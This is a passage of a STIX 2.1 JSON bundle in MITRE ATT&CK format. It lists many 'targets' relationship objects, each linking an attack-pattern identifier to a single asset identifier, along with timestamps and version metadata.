"created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823383", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6635314e-8810-45b9-8915-3238cfe6043f", "created": "2024-07-01T10:37:15.823391", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823393", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e7e17da3-eebd-4232-a88e-fecb804c3e72", "created": "2024-07-01T10:37:15.823401", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823403", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a2029942-0a85-4947-b23c-ca434698171d", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a9c101a6-960e-41fd-9a71-ef6c8f0bfab0", "created": "2024-07-01T10:37:15.823411", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823413", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a3e1e6c5-9c74-4fc0-a16c-a9d228c17829", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--31bcb72c-bfb7-4dd4-9e65-8e06a5c8583d", "created": "2024-07-01T10:37:15.823422", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823424", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--22821660-09f6-4334-898c-a90d575d883a", "created": "2024-07-01T10:37:15.823432", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823434", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cba75fdc-a7ab-4fb7-a722-ca9a1776e12e", "created": "2024-07-01T10:37:15.823442", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823444", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--19ee0b41-4088-431c-a27c-a6e995fcad47", "created": "2024-07-01T10:37:15.823451", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823453", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b367c7f4-b5da-47d3-a7f1-64e28eba4202", "created": "2024-07-01T10:37:15.823461", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823463", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--76cc8900-3e2f-4395-b885-acb4d8d43e1a", "created": "2024-07-01T10:37:15.823471", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823474", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--159b6fe8-d5b1-48d5-82a7-f37d307da1c3", "created": "2024-07-01T10:37:15.823481", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823483", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ac9e6b22-11bf-45d7-9181-c1cb08360931", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1acc89a2-ebb4-4369-bb00-6a5d9678683a", "created": "2024-07-01T10:37:15.823491", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823493", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dc658c7c-d533-4333-98a6-724b1f609ef2", "created": "2024-07-01T10:37:15.823501", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823503", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ad255bfe-a9e6-4b52-a258-8d3462abe842", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--739d9a5e-2b57-4f98-9400-1fc80b9fd8cb", "created": "2024-07-01T10:37:15.823511", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823513", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ae676644-d2d2-41b7-af7e-9bed1b55898c", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0c6e0f69-5c2f-4f47-af2b-a55c4a8cbd51", "created": "2024-07-01T10:37:15.823521", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823523", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7197bb3a-2656-4ab2-b57f-10324f142f2c", "created": "2024-07-01T10:37:15.823531", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823533", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b0533c6e-8fea-4788-874f-b799cacc4b92", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7761dc65-777d-49f2-b54e-681aade229d8", "created": "2024-07-01T10:37:15.823541", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823543", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--99d9b247-3893-4cf1-b6b1-baeaaf47ab3c", "created": "2024-07-01T10:37:15.823551", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823553", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--40ff1089-55e5-4fac-b544-4cc6f39d8b51", "created": "2024-07-01T10:37:15.823561", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823563", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c5ffa137-b4f4-41fb-bd87-ce8e8a866446", "created": "2024-07-01T10:37:15.823570", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823573", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b24e2a20-3b3d-4bf0-823b-1ed765398fb0", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--49cfee37-ba5c-495d-8163-cfa89202899a", "created": "2024-07-01T10:37:15.823580", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823583", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8f3d5963-1f9c-4398-a08c-5d6f94842cea", "created": "2024-07-01T10:37:15.823590", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823592", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a16288e5-0f97-42f9-9423-89b16eef0a13", "created": "2024-07-01T10:37:15.823600", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823602", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b4409cd8-0da9-46e1-a401-a241afd4d1cc", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--63267535-92f7-40f4-adec-3d91d20808da", "created": "2024-07-01T10:37:15.823610", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823612", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cc22f24c-a120-482b-ad5b-7607ebff6c46", "created": "2024-07-01T10:37:15.823620", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823622", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b6075259-dba3-44e9-87c7-e954f37ec0d5", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3b46eeb8-e6cf-482e-be3a-3df3dd4f3e11", "created": "2024-07-01T10:37:15.823630", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823632", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7645c880-5636-4166-90b4-ee4340d29403", "created": "2024-07-01T10:37:15.823640", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823642", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3f80ca08-818d-451f-93d1-af6f289deb03", "created": "2024-07-01T10:37:15.823650", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823652", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f422dd68-93ed-42d7-ae43-a23c27ab95e1", "created": "2024-07-01T10:37:15.823660", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823662", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--23721ae5-9a3f-4702-ac50-3e536ba538be", "created": "2024-07-01T10:37:15.823670", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823672", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--39ff1a47-e55a-4173-b0ba-c6563a723a90", "created": "2024-07-01T10:37:15.823680", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823682", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ba04e672-da86-4e69-aa15-0eca5db25f43", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bc2859e3-2a17-45fb-a9d7-4753f35276ce", "created": "2024-07-01T10:37:15.823689", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823691", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4f09b877-e6d3-43ba-b64b-f69026a61195", "created": "2024-07-01T10:37:15.823699", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823701", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bb5e59c4-abe7-40c7-8196-e373cb1e5974", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f5eb60d8-8363-4dfd-8efc-8caff7a6def7", "created": "2024-07-01T10:37:15.823709", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823711", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--33678be3-8c2b-4fb9-a6e9-8195f21ded37", "created": "2024-07-01T10:37:15.823719", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823721", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--850095ba-6d4f-4ee3-8aa6-ae1d75ad195d", "created": "2024-07-01T10:37:15.823729", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823731", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5bb80ceb-e349-4d4c-b183-b4f212592098", "created": "2024-07-01T10:37:15.823739", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823741", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--aea405d3-dfd7-4b73-b6ed-9f9c3a2c7701", "created": "2024-07-01T10:37:15.823749", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823751", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bef8aaee-961d-4359-a308-4c2182bcedff", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--977d28eb-6680-44ef-ae2b-600eb3e7ffe4", "created": "2024-07-01T10:37:15.823759", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823761", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2552d067-e765-43c6-8b98-58e095629fe1", "created": "2024-07-01T10:37:15.823769", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823771", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b0543715-b226-4ecc-a6b2-7c243067c9df", "created": "2024-07-01T10:37:15.823779", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823781", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2208aa86-ea88-4734-a2d0-fc0a17b4f5dc", "created": "2024-07-01T10:37:15.823789", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": 